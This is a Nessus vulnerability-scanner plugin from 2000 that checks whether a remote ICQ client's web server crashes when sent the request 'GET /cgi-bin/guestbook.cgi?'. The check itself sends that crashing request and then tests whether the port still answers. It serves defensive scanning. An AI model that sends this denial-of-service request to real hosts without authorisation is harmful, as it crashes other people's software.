#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#
#
if(description)
{
 script_id(10347);
 
 
 name["english"] = "ICQ Denial of Service attack";
 name["francais"] = "Dni de service ICQ";
 
 script_name(english:name["english"],
 	      francais:name["francais"]);
 
desc["english"] = "
It was possible to crash the remote ICQ client
by connecting to port 80 and sending the request:

	GET /cgi-bin/guestbook.cgi?
	
	
A cracker may use this problem to prevent you from
working properly.

Solution: deactivate the webserver service of the client

Risk factor : Low";

desc["francais"] = "
Il s'est avr possible de faire planter le client ICQ 
distant en se connectant au port 80 et en faisant la
requte :

	GET /cgi-bin/guestbook.cgi?

Un pirate peut utiliser ce problme pour vous empecher
de travailler correctement.


Solution : dsactivez le service 'serveur web' offert par ce client

Facteur de risque : Moyen";

 script_description(english:desc["english"]);
 
 summary["english"] = "ICQ denial of service";
 summary["francais"] = "Dni de service ICQ";
 script_summary(english:summary["english"]);
 
 script_category(ACT_DENIAL);
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison");
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"], francais:family["francais"]);
 script_require_ports(80, "Services/www");
 
 exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/www");
if(!port)port = 80;

if (get_port_state(port))
{
  soc = http_open_socket(port);
  if(soc)
  {
    req = http_get(item:"/cgi-bin/guestbook.cgi?", port:port);
    send(socket:soc, data:req);
    close(soc);

    sleep(5);
    
    soc2 = http_open_socket(port);
    if(!soc2)
      security_hole(port);
    else
      close(soc2);
  }
}

